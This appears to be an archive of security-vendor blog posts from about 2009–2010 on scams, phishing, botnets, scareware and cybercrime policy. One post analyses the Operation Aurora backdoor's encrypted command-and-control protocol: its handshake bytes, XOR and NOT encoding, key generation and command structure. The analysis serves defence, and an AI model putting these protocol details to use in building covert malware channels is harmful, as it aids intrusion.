If interested in this job, do fill the application form below send via e-mail to: SINOCEMJOB@AOL.COM

Now, putting this message through m Mental Debugging mode:

1. The company: SINOCHEM? Is it a fake or real company?

Unlike other scams that often create a whole fake infrastructure, including a functional fake company website, this one uses a real company as the lure. Sinochem is actually one of the largest companies in China.

2. So, Who is Mr. Chen Guogang? Did he REALLY send me this Job offer?

Mr. Chen Guogang is also a real person and is in fact the CFO of Sinochem. Now the next logical question – did he really send the Job offer?

A couple of things to think about here. First, why would the CFO of a real company contact anyone directly by email to offer a job? Second, why would the CFO would use an AOL email? Yes, it is an scam!

The original email asked a couple of questions, such as Name, Full Home Address, Age, Phone and email…which I replied to be very thankful for the opportunity since I was unemployed…:)

Day 2: The Job Confirmation!

One day after I sent it, I received an email back, with subject and Job Confirmation from the same AOL email: Chen Guogang sinocemjob@aol.com, which actually seemed to be using Gmail as the mail relay at the time.

An excerpt:

“let me personally congratulate you on your new job appointment to this noble companies,You can have my Job as a Part time one, it requires no time and can be easily done by just anyone.
I will notify you immediately funds are coming your way as I will implore you to check your email for regular updates.
It is important to confirm the receipt of every message received from us and a quick response to every update from henceforth is of high importance.”

Ok, so now I have a Job! Well, a part job that can be done by anyone…how good for my morale! But that is ok, at least I have a job! So I replied again.

Day 3: It’s Pay Day!

The 3rd email exchanged was about the Payment.

The subject is: PAYMENT SENT OUT

Some excerpts:

“Your honesty and prudent maters in handling of cash, financial transaction for this company, You are to take all records of received funds and their disbursement in a log book.

The first payment should be delivered to you this week, Do keep an eye on your email in the am for the instructions to be carried out upon the receipt of the payments.”

So, after I replied to all emails and proved that I am a good and honest employee, they will now start to send me the checks!

At this point I should start to receive, at least one time, but could be 2 or 3 times, fake or even fraudulent checks, which I would then get 10% to keep and forward the 90% to somewhere via Western Union. The trick here is that they required me to receive the check, deposit into my account, keep 10% and then send 90% out…BUT IN THE SAME DAY!! This means that I would not be able to wait until the check cleared and that is how the scam works, because by the time the check bounces back, my money would be already out…

Day 4: It is Pay Back time…

Feeling that I had enough info, I decided to reply to Mr Chen:

“ Hello Mr. Chen,

Once more, thank you for the opportunity. I was thinking here and that since I am quite low on cash, I decided to keep the first check as an advanced payment for my next services.
Hope that it works!”

Unfortunately I didn’t receive any email back after this one…I guess I was fired…:)

Rumors that made the rounds over the last several days turned out to be true: The infamous Storm botnet is being rebuilt using new variants of the malware that actually resemble the functionality of older Trojans!

Back “in the day,” the Storm botnet was one of the biggest botnets, sending out vast amounts of spam. As the market leader in spam-distributing botnets, it got a lot of attention from the security industry and the general public, ultimately leading to its demise. Since early 2009 the botnet was believed to be silent, even possibly defunct.

The new malware has been distributed widely over the last several days and the new botnet is already sending out spam. In an analysis done by Mark Schloesser, Tillmann Werner, and Felix Leder, German researchers who did a lot of work in analyzing the original Storm, they found that around two-thirds of the “new” functions are a copy and paste from the last Storm code base. What is missing is the original peer-to-peer (P2P) functionality, possibly in response to a tool these researchers developed that could bring down Storm. Cutting away the P2P functionality focuses the new Storm variants to HTTP communication with their command server.

This change basically means that the new botnet is “just” another botnet among the many thousands active today–with nothing special except the relationship with its notorious predecessor. However, the group running Storm has proven to be very resourceful in the past. And while it’s not clear if it is the same group, or another group reusing their code, we will certainly monitor this threat carefully.

So hopefully “Dark and Stormy” will remain my favorite drink rather than a prediction of what the future looks like for Storm.

Malicious PDF files and related exploits are invading the Net. Looking at the CVE records in the National Vulnerability Database for Adobe products, we see a dramatic increase in 2009.

Since January 1, Adobe vulnerabilities have continued to appear. During this period, five are classified as medium, while about 30 are judged high-level threats.

Now we find the Zeus botnet is also taking advantage of a PDF flaw: This vulnerability, along with about 15 others, are now covered by the recent patch (ABSB10-09).

In 2007 and at the beginning of 2008 most of the exploit samples in our malware collections were linked to HTML/iframe, WMF, or DCOM vulnerabilities.

Today malware involving malformed PDF file are legion. From less then 2 percent of malware directly connected to exploits in 2007 and 2008, they have reached 17 percent in 2009 and 28 percent during the first quarter of 2010. For Adobe Reader software, 2010 seems to be the year of living dangerously.

A new attack on Twitter users has been arriving as spam with a phishing link. It appears as a notification about an unread message from Twitter Support with a subject line such as “Twit 73-923.” The ending number can vary. The body of the message includes “You have [some number of] delayed message(s) from Twitter” and a link to a phishing site.

If you receive one of these emails, make sure to check where the link points to before clicking on it. To visit a page such as this (or any page even), it’s much safer to manually type the web address instead of clicking a link in an email. Links can easily be faked!

Users without protection who click on any of these links could infect their PCs or reveal their Twitter credentials.

We recommend you take advantage of either or both of McAfee’s TrustedSource™ reputation system and SiteAdvisor Technology to protect yourself against malicious phishing attacks and the sites that host them.

Tweet, search and surf safely out there!

As I write this blog today, a number of fabulous offers are spreading on Twitter, Facebook, and the Internet. They promise you a free Apple iPad, a free $1,000 IKEA gift card, and other incredible presents to lure people in search of a bargain. For that matter, we can read that the IKEA gift card scam took in nearly 40,000 Facebook users on April 12, and a similar offer fooled 70,000 victims in March.

Be careful: All these offers are fake. They exist only to collect personal data–your name, address, and e-mail–for future spam campaigns. They also take you to various lottery websites, where you are tempted to deposit funds for playing online instant and scratch games. I followed about 10 such offers; they all end in the same websites chosen according your country. Once there, you do not see any trace of the initial proposal (the iPad or gift card). To keep your interest, various windows and pop-ups announce numerous winners. To join them you need only an account and deposit some money.

For sure, these offers lure many people. Since the beginning of this dishonest advertising campaign, traffic to these dubious online casinos has shot up.

As I searched for an explanation, I contacted an employee via a chat window. I explained I was always redirected by these dubious advertising offers (the your-free-apple-ipod  URL, for example) to their casino after I gave my contact details. Of course, the person responding did not give me any explanation. “Are you interested by our games?” she asked. “Please register, we will offer you 5 euros. Otherwise, have a good day.” And she ended with a smile.

In France, online casino games are less numerous and less frequented than in the United States; but interest in these spare-time activities in increasing. From the both sides of the ocean, I recommend you limit yourself to well-known and registered institutions.

Scams based on the United States Internal Revenue Service requirements increase every year during tax season. It’s common to see online threats and tactics in which identity thieves and hackers try to convince taxpayers to reveal their personal and financial information. This year is no exception.

Researchers at McAfee Labs continuously monitor threats to best protect our customers. We have identified a cluster of fake IRS URLs. Victims might visit these phishing and malicious websites via any number of effective redirection methods: phishing attacks, forum postings, and black-hat search-engine optimizations, among others. However, a few simple precautions will help you avoid identity theft during tax season. If you get an email from the IRS, it’s probably a scam. The IRS does NOT usually contact taxpayers via email. Avoid replying or clicking on links that take you to suspicious sites. You should delete these messages.

The numbers of fake irs.gov domains hosting phishing sites already surpass last year’s:

McAfee customers are protected from malicious sites with high-risk reputations thanks to our TrustedSource technology.

Here is an example of how McAfee SiteAdvisor Technology and the McAfee TrustedSource™ reputation system protect users from cyberfraudsters. Malicious phishing attacks are blocked when they trying to steal consumers’ information:

The IRS Consumer Alert page says “The IRS does not send taxpayers unsolicited email about their tax accounts, tax situations, or personal tax issues.” To verify whether the IRS is trying to contact you, call the agency.

Last week in Strasbourg, France, the Council of Europe organized the Octopus Interface Conference 2010. More than 300 experts from all over the world, representing governments, law enforcement authorities, international organizations, and the Internet industry gathered to discuss the “Cooperation Against Cybercrime.”

On Tuesday, in the opening session, Maud de Boer Buquicchio, Deputy Secretary General of the Council, reminded the attendees that the international principles of human rights and the rule of law must apply online as well as offline. In this way, the Internet itself is now increasingly considered as a basic right. But in this new environment cybercrime is a greater concern than ever; it threatens those rights. Security and the protection of rights is the responsibility of both public authorities and private sector organizations. After a panel discussion run by countries engaged in the fight against cybercrime, Alexander Seger discussed the Budapest Convention on Cybercrime. Currently used by more than 100 countries around the world, it is the first international treaty on crimes committed via the Internet and other computer networks, dealing particularly with infringements of copyright, computer-related fraud, child pornography, and violations of network security.

Seger recommended the implementation of the convention worldwide to boost legislative reforms already underway in a large number of countries. Nations should consider adopting the policies to make use of the international cooperation provisions of this treaty. Increasing consensus on this treaty as a common framework of reference helps mobilize resources and create partnerships among public- and private-sector organizations. As a result, the ratification of the Budapest Convention by Azerbaijan, Montenegro, and Portugal prior and during the conference, and the expressions of interest from Argentina and other countries serve as examples to other countries.

In the afternoon, I joined a workshop on law enforcement responsibilities. Here, police units from various countries presented their services and discussed their local laws against cybercrime. I was particularly interested, as many of them discussed trends on this matter. In 2009, the Romanian National Police indexed 102 cases (indictments) with 766 offenses, 482 people charged, and 289 people arrested. In that country, 80 percent of IT fraud and phishing attacks are aimed at United States citizens, whereas 80 percent of credit card fraud (skimming) targets West European citizens. In Turkey, the the Organized Crime Department (KOM) made 2,871 arrests in 2009.

However, these figures represent only a small part of the fraud that is committed. In many cases, nobody files a complaint. After fraud is committed and reported, the bank refunds its conned client via their insurance company. The bank is well insured and the victim is compensated. As for the insurance company, its profit is barely affected. There is no need to alert the authorities.

In the second part of this workshop, people from the FBI and SOCA presented three objectives for law enforcement as well as recommendations for ICANN:

1. Due Diligence: ICANN needs to vet potential registrars and registries, through checks of international databases to ascertain an organization’s good standing. Registrars need to validate data received at the time of domain name registration and periodically thereafter.
2. WHOIS: Accurate and public WHOIS is essential. The proxy/privacy registrations have to be limited for private individuals for noncommercial purposes. Companies providing services should be accredited by ICANN.
3. Transparency and accountability: Domain name resellers and all third-party beneficiaries must be held to the same terms and conditions as registrars. ICANN should require all registrars, registries, proxy services, resellers, and all third-party beneficiaries of any contracts or policies of ICANN to publicly display ownership, parent companies, subsidiaries, and business associations.

On Wednesday, I participated in the mapping networks and initiatives workshop. Here, various organizations dealing with cybercrime presented their objectives and initiatives. Among them,the Inhope fight against illegal content (child sexual abuse images, extreme violence, racism and xenophobia, bestiality, online hate and xenophobia websites, adult pornography). Looking at their map representing countries saying “no” to illegal content, the audience realized that there is a long way to go:

In the next workshop, dedicated to technical assistance against cybercrime, two talks grabbed my attention. The first one exposed the situation in India. In this country, only about 10 percent of all cybercrimes committed are actually reported, and fewer than 2 percent result in a conviction. Nevertheless, 30 million judicial actions are pending. The Indian people purchase seven million mobile phones monthly. A large number do not have any traceability mechanism. This is a golden opportunity for terrorists who can use these phones without fear. 

The second talk was given by my colleague Greg Day, Director of Security Strategy for Europe, the Middle East, and Africa at McAfee. He presented various initiatives that industry can use to share intelligence and drive knowledge transfer. Besides training sessions and the direct line to McAfee Labs offered to various police crime units around the world, Day focused on the Industry Connections Security Group. This outfit gathers computer security entities to work on common goals and industry issues. Day sees that cybercriminals have leveraged the underground economy to gain economies of scale and access to specialist tools and services, whereas the security industry has generally responded to threats as individual entities. To tackle this problem, security professional established the ICSG, under the umbrella of the IEEE Standards Association, to pool their experiences and resources in response to the systematic and rapid rise in new malware being introduced to the market.

The last workshop I attended was on Thursday morning. We discussed cloud computing and the law enforcement challenges introduced by this new environment. Christian Aghroum, chief of the French National Unit for Countering Cybercrime, explained the threats facing data and services that are stored somewhere in the “Internet cloud.” His talk was a fitting conclusion for these three days in Strasbourg. Although there are no borders on the Net, the concept of national sovereignty keeps on confronting us. Human rights are acknowledged around the world, international maritime or air rights are usually respected, yet there is no universal right for the extra dimension that is the Internet. Unfortunately the Budapest Convention is far from accepted by all countries worldwide. In everyday police work, this produces a huge gap that greatly favors criminals. If a French neo-Nazi website is hosted in the United States, France really has little possibility of shutting it down. If a company leaves a foreign country after some diplomatic issues, there is no guarantee to ensure the security of its data stored in the cloud. Today, in some cases, we cannot maintain security in our country because of the start of cloud-based services. In one or two years, this will be worse in the “absolute cloud,” which will have no borders. If international laws are not rapidly created, based on the Budapest Convention, the problems will certainly become worse.  

Before ending this post, I have to mention the Nigerian delegation, which offered us a song made by famous Nigerian singers. “Maga No Need Pay!” denounces fraud. (Maga is the Nigerian word for victims of fraud.) To the Nigerian people, the song explains that fraud is not the right way toward a better life. To the rest of the world, it explains that Nigeria is a great country that should not be considered solely corrupt.

Cybercrime must be fought with laws and technology, but it can be also fought with music.

The clip is viewable here.

All over the world, individuals and many organized crime and mafia groups have found that the Internet can help them make a lot of money. Others are motivated by ideology: Manipulated by or acting in accordance with an ethos, they conduct illegal activities against institutions or individuals they consider the “enemy.” Far removed from the isolated individuals acting simply irresponsibly or for amusement, these two groups constitute the double threat we know today as cybercrime and hacktivism.

Last week we published a new report that looks, in great depth, at this phenomenon. The main goal is to explain how these organized groups have become established and what the extent of their activities are. In the first part of this report, after offering some definitions, we present some of the major participants who simply cannot be ignored. The second part deals with various topics including cybercrime and hacktivism, economics, politics, culture, and others. Each topic is illustrated with examples found in the news. Through other examples, the third part of the document deals with prices and the return on investment criminals can expect.

Chinese, Japanese, and Brazilian Portuguese versions are also available from the McAfee Labs Technical White Papers web page.

This is the time of year when basketball fans go online to fill out their bracket selections. While fans are playing with their brackets, hackers are also playing their own game of “spamdexing”-–manipulating search results to promote, in this case, malware-infected sites.

At the time of this posting, top search results for terms such as ncaa bracket and march madness predictions are already poisoned. Five out of the first ten hot searches on Google Trends, with ncaa+bracket+blank taking second place, are being promoted by a network of legitimate sites that were hacked to serve malware.

Let’s look at the bracket-related malware site. Our investigations reveal the site has an embedded Flash file that downloads malware from another site and installs without user interaction. Who would have thought that a simple, harmless-looking site with only a bunch of March Madness-related texts as content and not even a single pop-up or web ad could be that dangerous?

This simple–yet very sneaky and effective technique of downloading malware through exploitation, also called a “drive-by download”–will surely infect a lot of users, especially users with no virus and malware protection. To reduce the chance of getting infected by this type of site, we recommend using our SiteAdvisor technology, a free browser plug-in that shows site ratings with search results. And, as always, make sure your anti-malware software is up to date and properly configured!

Today has been quite a busy day for scammers. We at McAfee Labs have been tracking a global scam/spam run that targets Facebook users. The lure used in the run is a familiar one:

Facebook Password Reset Confirmation! Customer Support.

The email looks like the following:

The activity on this particular scam run has been global from the beginning, and thanks to our Artemis “cloud” technology we have dealt with it very efficiently. The malware in the attachment is pretty much what one would expect: downloaders, password-stealing Trojan, fake-AV, or bot stuff, depending on which one you got. Check out the Artemis map of this malware:

To give you an idea of the scope of the run, it reached as high as No. 6 (!) on our Global Virus Map’s Top 10, which tracks consumer detections worldwide. It even accounts for as much as 10 percent of the infected email that our managed email SaaS unit is seeing. From the looks of the spams themselves they may be associated with the Cutwail or Rustock botnets, but that analysis is still ongoing.

As we had previously discussed in our 2010 Threat Predictions, social networking sites will continue to be a favorite social engineering lure for cybercriminals to distribute malware. Make sure you are protected and educated.

You can submit information about any fake Facebook email to the Facebook Security Team. Facebook also has a great security page that I recommend to all Facebook users.

On March 9 McAfee warned consumers that “scareware,” or fake anti-virus software, may be the most costly online scam in 2010, causing significant monetary loss and damage to users’ computers. In this blog, I’ll give you some additional details about the figures we cited last week in McAfee’s new Consumer Threat Alert program.

Apart from the scareware files themselves, many malware that aid rogue anti-virus programs in attacking computers are grouped into the fake-alert Trojan family. As shown in the following graph, their number exploded in 2009. To give you some idea of the rapid growth, from March 1 to March 10, 45,000 new FakeAlert samples entered in our malware collection!

Between January 2004 and December 2009, I cataloged more than 3,000 scareware software “products” created by various rogue companies. Many of them have a short life cycle (some weeks, some months), while others, some created in 2004, are still available on the web. For half of them (see next table) we were able to extrapolate the year they appeared. Their number surpassed 100 for the first two months of 2010.

For many of these “products,” only the name changes. This trick maximizes a malware developer’s chances to catch victims. The scareware companies create website after website with a single rogue offer repeated under various names.

Fake-alert malware and scareware software are numerous. But scareware companies are restricted in number. Perhaps between 30 and 50. The names change, but the managers remain the same. They create many subsidiaries and recruit affiliates. For more than 2,000 of these products, I was able to map them to the companies that distribute them. To avoid possible legal hassles as well as personal trouble, I will not give you the names–but the following table speaks for itself.

Some companies work openly. Their managers are not afraid to create even LinkedIn profiles. When the pressure becomes too strong they simply create a new business.

To multiply sales, scareware companies recruit affiliates and promise them commissions reaching 75 percent of the product’s sales price.

When I presented our research on scareware in Paris in January, I explained that a colleague monitored–during a six-month period–the production servers of one of the main scareware companies. In 10 days, he counted more than four million downloads (that is, more than four million scareware infections)! This was from only one company, and some victims made more than one download in a day.

In 11 months, this scareware company received more than 4.5 million orders. Using this figure, I forecast annual revenues of greater than US$180 million. This leads to a substantial worldwide income for this criminal activity.

Finally, these scareware companies have not only fake security software for sale. They also peddle many other fake products (multimedia software, fitness software, family software, etc.). And, above all, they offer pornography. Consequently, their revenues are still greater.

To avoid becoming a security software scam victim, the McAfee Consumer Threat Alert advises the following:

1. Before downloading any security software from the Web, get a recommendation from someone you trust who is savvy about Internet security software
2. Investigate the company before purchasing the software
3. Be careful when responding to pop-up ads
4. You can protect your computer from these types of cybercrimes by installing a complete security software suite that includes anti-virus, anti-spyware, and firewall protection, such as McAfee Total Protection. Ensure that your software is always up to date (enable the “auto-update” feature) and perform regular scans.

Last week Apple formally announced the launch date for the Wi-Fi version of its much anticipated new tablet computer, the iPad. As with most events that generate a lot of media and consumer interest, this one also generated curiosity from the spammer community. They wonder how they can leverage this event to steal your sensitive information. 

Scams have already started to surface, claiming how you can win your own iPad for free. All you need to do is provide your address for shipment, and … Oh, yeah, to get your “free” iPad you also need to purchase something, which will require you to give us your credit card details. There had to be a catch somewhere.

Here is an example of such an email:

This scam is basically your typical “free offer” scam, but given the popularity and buzz surrounding any Apple product announcement, it’s essential to identify the legitimate from the “too good to be true.” As the release date for the iPad approaches, more scams such as this are likely to emerge, using email, social media technologies, and common search engine terms for delivery. 

Keep your eyes open, be diligent, and if you question whether any kind of offer you receive in email or on the web is legitimate, you should follow your instincts. Such offers are likely to be bogus.

5, 4, 3, 2, 1…malware!

It’s like clockwork, ain’t it? A popular holiday–such as Valentine’s Day–approaches and malware authors and cybercriminals ready for it.

I have done some Valentine’s Day searches for poisoned terms and found some nasty ones very quickly. Screensavers and ecards are always popular:

Even Rolex watches on Valentine’s Day are not safe:

Some of the poisoned terms I have seen today:

Valentine’s Day Screensavers
Valentine’s Day Downloads
Valentine’s Day Wallpaper
Valentine’s Day Rolex
Valentine’s Day eCards
Animated Valentine’s Day
Valentine’s Day Greetings
Valentine’s Day Cupids
Valentine’s Day Gift Ideas

Make sure you surf safely with SiteAdvisor and keep that machine updated!

Today we unveiled our Threats Report for the fourth quarter of 2009. It highlights many of the most significant spam-generating stories in 2009 as well as the rise of political hacktivism in countries such as Poland, Latvia, Denmark, and Switzerland. The report’s findings also reveal that 2009 averaged approximately 135.5 billion spam messages per day; yet spam volume decreased by 24 percent in Q4 compared with Q3.

Spammers piggybacked heavily on leading headlines in 2009, taking advantage of breaking news stories, global tragedies, and other timely events. The Air France plane crash and Michael Jackson’s death were among the top tragedies exploited by spammers last year. McAfee researchers also noted a significant number of 2010 FIFA World Cup-themed phishing scams, Zeus Trojans masked as the CDC and referencing the H1N1 vaccine program, and “get rich quick” scams due to the rise of U.S. unemployment levels.

Politically motivated attacks are on the rise around the world, targeting popular social networking destinations, as seen recently with the Iranian Cyber Army’s political attack aimed at Twitter. The report confirms that the United States is not the sole target, nor is China the sole origin for these types of assaults. Recent political attacks targeted the Polish government, the Copenhagen Climate Conference, and Latvia’s Independence Day.

Malware–including fake security software, attacks on social networks, and AutoRun USB infections–continued to rise significantly last year. Internet-based, Web 2.0-centric attacks and threats on portable storage devices played a huge role in 2009, contributing greatly to the immense increase in threats and demonstrating how the nature of computer threats are evolving over time. Cybercriminals used social networking sites to target a new generation of victims, with Koobface activity increasing considerably during the latter part of 2009. Koobface is now hosted by servers in 46 countries, with the United States, Germany, and Denmark making up the top three hosting locations.

China Overtakes the U.S. as No. 1 Country Producing Zombies

Zombie production in the U.S. dropped significantly, from 13.1 percent in Q3 to 9.5 percent in Q4, making China the top Zombie-producing country at 12 percent. Brazil ranked third, with Russia and Germany rounding out the top five countries. The United States still remains the number one country in spam production, with Brazil and India taking the number two and three spots. Ukraine and Germany joined the list of top 10 countries producing spam for the first time in 2009.

The Geographic Distribution of Web Threats

North America is the worldwide leader in hosting malicious content, with Europe/Middle East/Africa second, followed by Asia/Pacific. In Europe, Germany holds the number one spot, followed by the Netherlands and Italy. China is the chief host for malicious content in Asia, followed by Russia and South Korea. South America is beginning to play a larger role, with Brazil as the top hosting country in that region.

China is the Worldwide Leader in SQL-Injection Attacks

Although SQL-injection attacks originate from a number of countries across the globe, China was by far the number one country hosting these assaults, at 54.4 percent. Due to the growing popularity of Adobe applications, McAfee Labs saw a number of client-targeted attack attempts to exploit Flash and Acrobat reader.

A full copy of the Q4 2009 Threats Report is available here.

Never is the heartless nature of cybercriminals more apparent than in the wake of a tragedy. As relief efforts continue and worldwide aid pours in to help those affected by the earthquake that rocked Haiti on January 12, cybercriminals have not slowed their efforts. They are eager to get you to donate money that the people of Haiti will never see. Spoofing legitimate relief organizations such as the Red Cross is a typical social engineering lure used by the bad guys to take your money. This morning, however, a particular scam caught my eye that I wanted to share with you. Its subject line was “Help for Haiti” and was sent by “b.obama@whitehouse.gov.” Mr. “b.obama” writes:

I’ve censored some of the contact information so that nobody visiting this blog will attempt to send money to the people responsible for this scam. I cannot emphasize enough that you must perform due diligence before donating to any charity. Ensure that the money you donate is going to the cause that you choose.

A couple of things to remember:

• Don’t respond to emails requesting donations, credit card information, or other sensitive information that you do not feel comfortable giving
• Don’t click links within email that direct to donation websites, as they may be directing you to a malicious website under the covers
• Don’t open attachments with donation forms, as they may be executable malware
• Work directly with charity organizations that you know and trust

Cybercriminals prey on the emotions of their victims. That’s why social engineering tactics such as these are successful. However, if you do your homework first, follow safe email and web-browsing habits, and work closely only with reputable charities to donate money, you can feel more comfortable that your sensitive information won’t end up in the wrong hands.

We are pleased to announce the next event in our complimentary monthly “Hacking Exposed Live!–A Webcast Series,” which educates attendees to protect against cybercrime and hackers. The monthly webcast, hosted by Hacking Exposed coauthor and McAfee Senior Vice President Stuart McClure, walks attendees through the latest hacking techniques and explains countermeasures for preventing attacks.

The next webcast is January 21 at 11 a.m. Pacific time (2 p.m. Eastern) and will feature two white-hot security topics: Botnets and Aurora–the zero-day vulnerability that last week struck Google and several other well-known companies. McAfee Worldwide Chief Technology Officer George Kurtz and McAfee Senior Director Greg Brown will join McClure to enlighten the audience on how hackers exploit these vulnerabilities and what can be done to prevent them from impacting businesses.

Based on the best-selling security book Hacking Exposed, this live monthly webcast gives attendees deep insights into current and evolving hacks and what they can do to keep their environments protected. The webcasts include everything attendees need to know to stay ahead of those who would cause harm. The sessions will also address the universe of hacks–involving social media, mobile, Unix, and more.

Click here to learn more and register today.

As we know, the recent Operation Aurora has been making waves due to a highly organized attack targeting companies such as Google, Adobe and other high profile companies. A security breach due to a vulnerability in Microsoft’s Internet Explorer, CVE-2010-0249, caused remote code execution leading to download of malware on compromised systems.

At McAfee Labs, researchers have been working around the clock across regions to delve deeper into the inner workings of this attack in an effort to educate and assist customers in its mitigation. In this blog we discuss the communication protocol being utilized by Aurora which depicts how organized and technical this attack is.

We also discuss the backdoor components of Aurora which would allow the hackers to take complete control of the victim’s machine. The backdoor components, which were dropped in the system by Roarur.dr after the successful exploitation by Exploit-Comele, are composed of several variants of Roarur.dll.

All samples used highly obfuscated code, with small pieces of code connected via jumps and calls, and separated by NOPs:

One thing in common between these DLL variants is the protocol used to communicate with the command & control server. Let’s take a look at how this protocol works.

After the initialization of the malware DLL, a connection is made to the command and control (C&C) server. The connection is made on port 443 which is usually used by the HTTPS protocol, encrypted with SSL. During analysis, we noticed that the employed protocol on this port was not the standard SSL protocol, but a custom encrypted protocol.

The backdoor client initiates the protocol by issuing a packet which always has the same first 20 bytes:

[ ff ff ff ff ff ff 00 00 fe ff ff ff ff ff ff ff ff ff 88 ff ]

After the initiator handshake, the protocol uses a 20 byte packet as header for all communication that follows. All data sent from client to server is encoded with a logical NOT, and all data received from server is XOR encoded with 0xCC. So the first reply from server would be:

[ CC CC CC CC CD CC CC CC CD CC CC CC CC CC CC CC XX XX XX XX ]

(where XX can represent any byte)

The handshake is followed by information gathering. The backdoor gathers the following information from the victim’s machine and sends it back to the server:

• Content of HARDWARE\DESCRIPTION\System\CentralProcessor\MHz registry key
• Service pack name
• Machine name
• OS Version

At the time the operation was made public by Google, the control servers were offline, hence we don’t have access to the actual communication. However after understanding the protocol and the expected commands at the client end, we were able to set up a fake environment allowing us to initiate commands to the client. In this way we were able to force the malware to behave in a way we requested.

Based on this, we found that the structure of the header is the following:

Commands can have any value between 0×02 and 0×14, which gives the hacker 18 possible commands. But these commands can be extended by the use of the parameters, which change the behavior of the command executed:

One interesting note on the protocol is the fact that each client uses a different encryption key to obfuscate the data sent to server. It makes a call to GetTickCount() to generate a random encryption key which is sent as part of the header in the outgoing packet. This key is used to encrypt the data between client and server afterwards. Indeed an interesting approach.

The “extra data” part of the packet can contain any information the hacker wants. Based on the commands executed, this could be which drives/files the user has on the system, information to install a new service, or even a file to drop on the system.

The transmission of this extra data is made in two steps:

• The backdoor receive the header, decrypts it with XOR 0xCC and gets the command
• The command is executed
• Based on the command, if there is extra data to receive, get the extra data size and check if the encryption key is the same as the one sent before
• Apply a XOR 0xCC decryption to the Extra Data.
• Decrypt with given encryption key

We believe this is how the file Acelpvc.dll was dropped on the system. This is another backdoor component which can be installed as a service and receive two parameters: IP and port.

Acelpvc.dll, once loaded, opens a connection on this server:port using the same encrypted protocol. This way, the hackers could make the victim’s computer connect to another server and guarantee his access to the system even if his connection is cut.

As you can see this attack involved very advanced methods with several pieces of malware working in concert to give the attackers full control of the infected system, at the same time it attempts to disguise itself as a common connection to a secure website. This way the attackers were able to covertly gather all the information they wanted without being discovered.

Hopefully this brief will provide users with a good basic understanding of the custom backdoor protocol used during Operation Aurora. Stay tuned for more information on Aurora as McAfee dissects it 

Update Jan 19, 2010 (product coverage update)
McAfee Network Security Platform: The UDS release of January 19 contains the signature “UDS-BACKDOOR: Operation Aurora Channel Detected” to detect this backdoor.

Angelina Jolie and Barack Obama are the #1 celeb subjects of choice for spammers, according to our January Spam Report. The report also reveals:

• The top 25 men and women that were spammed
• Chinese pharma spam isn’t going away – in fact, on Dec 14, spam levels skyrocketed with subject lines advertising discounts on Pfizer drugs
• “Free-hosting” websites to provide spam URLs has become a major target for spammers

Be mindful of those celebrity names that appear in your inbox! Download the full report here.

Day 2 and Night 2 of the 26th Chaos Communication Congress is over, so it’s time for a short update on what you are missing here.

This year the Congress is organized as a distributed event: Many local Hacker Spaces have joined the network at Berlin Conference Center, giving access to resources and talks to visitors. Check out the Dragons Everywhere Wiki at 26c3 for more info. And of course there are still the live streams of the talks available.

One highlight was certainly an update of the current debate around the Vorratsdatenspeicherung (“data retention”). CCC-spokesperson Constanze Kurz expects a favorable ruling against the current laws by the highest German court. This may have an EU-wide impact.

At the same time (and thank goodness there were streams available!) was Collin Mulliner’s talk about fuzzing smart phones and some of his (and Charlie Miller’s) findings.

Felix ”FX” Lindner changed sides: In a talk covering defense instead of breaking things, he demonstrated the security problems that come with Flash and released a tool for sandboxing .swf files to prevent a class of Flash exploits called Blitzableiter (“lightning rod”). His tool is still work in progress but looks very promising already.

And to finish the day there was the Phonoelit Party at c-base, featuring Mumpi, Vela, and Illo. Another great event!

Of course, this selection is just my personal preference. Make sure to check the schedule for talks that interest you.

With the New Year just days away, it’s time for McAfee Labs 2010 Threat Predictions. What should you be wary of in the coming year? Social networks.

Sites such as Twitter and Facebook have changed the way we communicate, interact, and share on the web. As user bases for the top online social destinations reach record highs, cybercriminals are building out their criminal toolkits, taking advantage of new technologies, third-party applications, and hotspots of activity to exploit users.

What does this mean for the average surfer? Next time you receive an invite from one of your “Facebook friends” to play a game that looks like it’s shaping up to be the next Farmville, think twice before you click. In 2010, users are going to be more vulnerable to attacks that blindly distribute fake apps across their networks. The same goes for bit.ly’s and TinyURLs. As abbreviated URLs become more ubiquitous, it will be even easier for cybercriminals to mask and direct users to malicious sites.

Speaking of ubiquity: McAfee Labs predicts that Adobe will overtake Microsoft as the No. 1 target for cybercriminals in 2010. Adobe products—in particular Acrobat Reader and Flash—have become two of the most widely used apps in the world, and cybercriminals go where the masses go. Cybercriminals will have a field day preying on people using Adobe software.

McAfee also believes the following will play a critical role in 2010:

• Banking Trojans will become even more sophisticated. They showed some firepower in 2009—easily getting around current protections used by banks—but next year they will reach a new level with the ability to interrupt legitimate transactions and make unauthorized withdrawals, while flying under the radar.
• Malware via email attachments will increase, especially targeting corporations, journalists, and individuals
• Botnets, the infrastructure that launches nearly every type of cyberattack, will adopt a peer-to-peer architecture, connecting computer to computer without a centralized control point—making it more difficult for cybersecurity professionals to detect them
• HTML 5 and the evolution of the programming language will give cybercriminals new opportunities to write malware and prey on users

Countering these trends, in 2010 McAfee predicts a good year for law enforcement and the ability to identify, track, and combat cybercrime worldwide. After a decade of cybersecurity research, coordination, and training undertaken by agencies across the globe, the community will reap the benefits of the effort put forth over the past ten years.

McAfee Labs serves up the details on its threat predictions in the full report. Surf the web cautiously in 2010!

(We must correct one oversight: Our colleague Pedro Bueno was one of the authors of the report. His name was inadvertantly left off the document. Thanks, Pedro!)

Koobface has been busy. Activities associated with the worm have increased during the month of December. Often the activity is sending traffic to compromised servers to obtain more servers. Other times it uses those compromised servers to proxy users to malicious domains that distribute more malware or take control of the infected machines.

This morning we noticed a trend: some of the domain-based locations are making use of the holiday theme. This has included everything from “presents for your pets” to “festive holiday trees.” These are domains that appear legitimate but are not. In fact, many of the domains were legitimate at one point but are now are serving a different purpose.

When users go to these these happy holiday sites, they are greeted by having files downloaded to their computers. Then they receive the gift of holiday identity theft!

We have monitored the progress of this attack and its spread throughout the day. Based upon past trends we expect it to continue to evolve and find new servers and methods with similar associations over the next few weeks.

Stay updated and safe over the holidays!

Ketchup stains. Klingons. Exploding monitors. They’re all part of our fiendishly clever new music video, “Hacker’s Holiday.” Pity poor Tiny Tim. He gets a shiny new PC for Christmas and doesn’t bother to protect it. Well, you can guess the rest. A few short days later (12 days maybe?) his PC is ready for the ashcan of history. But how will Tiny Tim exact his revenge? Watch and learn:

And yeah, that’s one guy doing all the sounds, all the singing, all the work. Mister Tim, also star of Enter Kazoo Man and the composer of Star Wars (John Williams is the Man) wrote this little ditty with our help.

If you like it, star it and share it. Thanks! And Happy Holidays from McAfee.

